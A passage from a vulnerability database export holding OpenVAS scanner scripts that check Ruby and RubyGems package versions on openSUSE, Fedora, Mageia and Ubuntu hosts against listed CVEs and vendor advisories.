rpm:\"ruby2.1-debuginfo~2.1.9~8.3.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1-debugsource\", rpm:\"ruby2.1-debugsource~2.1.9~8.3.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1-devel\", rpm:\"ruby2.1-devel~2.1.9~8.3.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1-devel-extra\", rpm:\"ruby2.1-devel-extra~2.1.9~8.3.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1-doc\", rpm:\"ruby2.1-doc~2.1.9~8.3.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1-stdlib\", rpm:\"ruby2.1-stdlib~2.1.9~8.3.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1-stdlib-debuginfo\", rpm:\"ruby2.1-stdlib-debuginfo~2.1.9~8.3.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1-doc-ri\", rpm:\"ruby2.1-doc-ri~2.1.9~8.3.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"openSUSELeap42.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"libruby2_1-2_1\", rpm:\"libruby2_1-2_1~2.1.9~10.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libruby2_1-2_1-debuginfo\", rpm:\"libruby2_1-2_1-debuginfo~2.1.9~10.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1\", rpm:\"ruby2.1~2.1.9~10.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1-debuginfo\", rpm:\"ruby2.1-debuginfo~2.1.9~10.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1-debugsource\", rpm:\"ruby2.1-debugsource~2.1.9~10.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1-devel\", rpm:\"ruby2.1-devel~2.1.9~10.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1-devel-extra\", rpm:\"ruby2.1-devel-extra~2.1.9~10.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1-doc\", rpm:\"ruby2.1-doc~2.1.9~10.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1-stdlib\", rpm:\"ruby2.1-stdlib~2.1.9~10.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1-stdlib-debuginfo\", rpm:\"ruby2.1-stdlib-debuginfo~2.1.9~10.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"uby2.1-doc-ri\", rpm:\"uby2.1-doc-ri~2.1.9~10.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:02", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-08-20T00:00:00", "type": "openvas", "title": "Fedora Update for rubygems FEDORA-2015-13157", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3900"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310869888", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869888", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygems FEDORA-2015-13157\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869888\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-08-20 06:42:54 +0200 (Thu, 20 Aug 2015)\");\n script_cve_id(\"CVE-2015-3900\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygems FEDORA-2015-13157\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygems'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygems on Fedora 21\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-13157\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-August/164236.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC21\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygems\", rpm:\"rubygems~2.2.5~100.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:36:36", "description": "Mageia Linux Local Security Checks mgasa-2015-0345", "cvss3": {}, "published": "2015-10-15T00:00:00", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2015-0345", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3900"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310130042", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310130042", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2015-0345.nasl 11692 2018-09-28 16:55:19Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.130042\");\n script_version(\"$Revision: 11692 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-15 10:41:54 +0300 (Thu, 15 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 18:55:19 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2015-0345\");\n script_tag(name:\"insight\", value:\"Updated ruby-RubyGems package fixes security vulnerability: RubyGems does not validate the hostname when fetching gems or making API request, which allows remote attackers to redirect requests to arbitrary domains via a crafted DNS SRV record, aka a DNS hijack attack (CVE-2015-3900).\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2015-0345.html\");\n script_cve_id(\"CVE-2015-3900\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2015-0345\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"ruby-RubyGems\", rpm:\"ruby-RubyGems~2.1.11~5.1.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:37:04", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-08-11T00:00:00", "type": "openvas", "title": "Fedora Update for rubygems FEDORA-2015-12574", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3900"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310869851", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869851", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygems FEDORA-2015-12574\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869851\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-08-11 06:35:29 +0200 (Tue, 11 Aug 2015)\");\n script_cve_id(\"CVE-2015-3900\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygems FEDORA-2015-12574\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygems'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygems on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-12574\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-August/163600.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygems\", rpm:\"rubygems~2.4.8~100.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-12-20T19:39:45", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-07-26T00:00:00", "type": "openvas", "title": "Ubuntu Update for ruby2.3 USN-3365-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-5147", "CVE-2016-2337", "CVE-2015-1855", "CVE-2016-2339", "CVE-2015-7551", "CVE-2016-7798", "CVE-2015-9096"], "modified": "2019-12-20T00:00:00", "id": "OPENVAS:1361412562310843256", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843256", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for ruby2.3 USN-3365-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843256\");\n script_version(\"2019-12-20T08:10:23+0000\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 08:10:23 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-07-26 07:16:30 +0200 (Wed, 26 Jul 2017)\");\n script_cve_id(\"CVE-2009-5147\", \"CVE-2015-1855\", \"CVE-2015-7551\", \"CVE-2015-9096\",\n \"CVE-2016-2337\", \"CVE-2016-2339\", \"CVE-2016-7798\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for ruby2.3 USN-3365-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ruby2.3'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that Ruby DL::dlopen\n incorrectly handled opening libraries. An attacker could possibly use this issue\n to open libraries with tainted names. This issue only applied to Ubuntu 14.04\n LTS. (CVE-2009-5147) Tony Arcieri, Jeffrey Walton, and Steffan Ullrich\n discovered that the Ruby OpenSSL extension incorrectly handled hostname wildcard\n matching. This issue only applied to Ubuntu 14.04 LTS. (CVE-2015-1855) Christian\n Hofstaedtler discovered that Ruby Fiddle::Handle incorrectly handled certain\n crafted strings. An attacker could use this issue to cause a denial of service,\n or possibly execute arbitrary code. This issue only applied to Ubuntu 14.04 LTS.\n (CVE-2015-7551) It was discovered that Ruby Net::SMTP incorrectly handled CRLF\n sequences. A remote attacker could possibly use this issue to inject SMTP\n commands. (CVE-2015-9096) Marcin Noga discovered that Ruby incorrectly handled\n certain arguments in a TclTkIp class method. An attacker could possibly use this\n issue to execute arbitrary code. This issue only affected Ubuntu 14.04 LTS.\n (CVE-2016-2337) It was discovered that Ruby Fiddle::Function.new incorrectly\n handled certain arguments. An attacker could possibly use this issue to execute\n arbitrary code. This issue only affected Ubuntu 14.04 LTS. (CVE-2016-2339) It\n was discovered that Ruby incorrectly handled the initialization vector (IV) in\n GCM mode. An attacker could possibly use this issue to bypass encryption.\n (CVE-2016-7798)\");\n script_tag(name:\"affected\", value:\"ruby2.3 on Ubuntu 17.04,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3365-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3365-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|17\\.04|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libruby1.9.1\", ver:\"1.9.3.484-2ubuntu1.3\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libruby2.0:amd64\", ver:\"2.0.0.484-1ubuntu2.4\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libruby2.0:i386\", ver:\"2.0.0.484-1ubuntu2.4\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ruby1.9.1\", ver:\"1.9.3.484-2ubuntu1.3\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ruby2.0\", ver:\"2.0.0.484-1ubuntu2.4\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU17.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libruby2.3\", ver:\"2.3.3-1ubuntu0.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ruby2.3\", ver:\"2.3.3-1ubuntu0.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libruby2.3\", ver:\"2.3.1-2~16.04.2\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ruby2.3\", ver:\"2.3.1-2~16.04.2\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-04T17:34:49", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-04-06T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for ruby2.2 (openSUSE-SU-2017:0933-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2339", "CVE-2015-7551"], "modified": "2020-06-03T00:00:00", "id": "OPENVAS:1361412562310851531", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851531", "sourceData": "# Copyright (C) 2017 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851531\");\n script_version(\"2020-06-03T08:38:58+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-03 08:38:58 +0000 (Wed, 03 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-04-06 06:33:15 +0200 (Thu, 06 Apr 2017)\");\n script_cve_id(\"CVE-2015-7551\", \"CVE-2016-2339\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for ruby2.2 (openSUSE-SU-2017:0933-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ruby2.2'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for ruby2.2, ruby2.3 fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2016-2339: heap overflow vulnerability in the\n Fiddle::Function.new'initialize' (boo#1018808)\n\n - CVE-2015-7551: Unsafe tainted string usage in Fiddle and DL (boo#959495)\n\n Detailed ChangeLog are linked in the references.\");\n\n script_xref(name:\"URL\", value:\"http://svn.ruby-lang.org/repos/ruby/tags/v2_2_6/ChangeLog\");\n script_xref(name:\"URL\", value:\"http://svn.ruby-lang.org/repos/ruby/tags/v2_3_3/ChangeLog\");\n\n script_tag(name:\"affected\", value:\"ruby2.2, on openSUSE Leap 42.2, openSUSE Leap 42.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2017:0933-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSELeap42\\.2|openSUSELeap42\\.1)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.2\") {\n if(!isnull(res = isrpmvuln(pkg:\"libruby2_2-2_2\", rpm:\"libruby2_2-2_2~2.2.6~6.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libruby2_2-2_2-debuginfo\", rpm:\"libruby2_2-2_2-debuginfo~2.2.6~6.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libruby2_3-2_3\", rpm:\"libruby2_3-2_3~2.3.3~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libruby2_3-2_3-debuginfo\", rpm:\"libruby2_3-2_3-debuginfo~2.3.3~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2\", rpm:\"ruby2.2~2.2.6~6.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-debuginfo\", rpm:\"ruby2.2-debuginfo~2.2.6~6.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-debugsource\", rpm:\"ruby2.2-debugsource~2.2.6~6.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-devel\", rpm:\"ruby2.2-devel~2.2.6~6.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-devel-extra\", rpm:\"ruby2.2-devel-extra~2.2.6~6.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-doc\", rpm:\"ruby2.2-doc~2.2.6~6.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-stdlib\", rpm:\"ruby2.2-stdlib~2.2.6~6.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-stdlib-debuginfo\", rpm:\"ruby2.2-stdlib-debuginfo~2.2.6~6.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-tk\", rpm:\"ruby2.2-tk~2.2.6~6.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-tk-debuginfo\", rpm:\"ruby2.2-tk-debuginfo~2.2.6~6.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.3\", rpm:\"ruby2.3~2.3.3~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.3-debuginfo\", rpm:\"ruby2.3-debuginfo~2.3.3~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.3-debugsource\", rpm:\"ruby2.3-debugsource~2.3.3~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.3-devel\", rpm:\"ruby2.3-devel~2.3.3~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.3-devel-extra\", rpm:\"ruby2.3-devel-extra~2.3.3~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.3-doc\", rpm:\"ruby2.3-doc~2.3.3~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.3-stdlib\", rpm:\"ruby2.3-stdlib~2.3.3~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.3-stdlib-debuginfo\", rpm:\"ruby2.3-stdlib-debuginfo~2.3.3~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.3-tk\", rpm:\"ruby2.3-tk~2.3.3~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.3-tk-debuginfo\", rpm:\"ruby2.3-tk-debuginfo~2.3.3~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-doc-ri\", rpm:\"ruby2.2-doc-ri~2.2.6~6.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.3-doc-ri\", rpm:\"ruby2.3-doc-ri~2.3.3~2.3.1\", 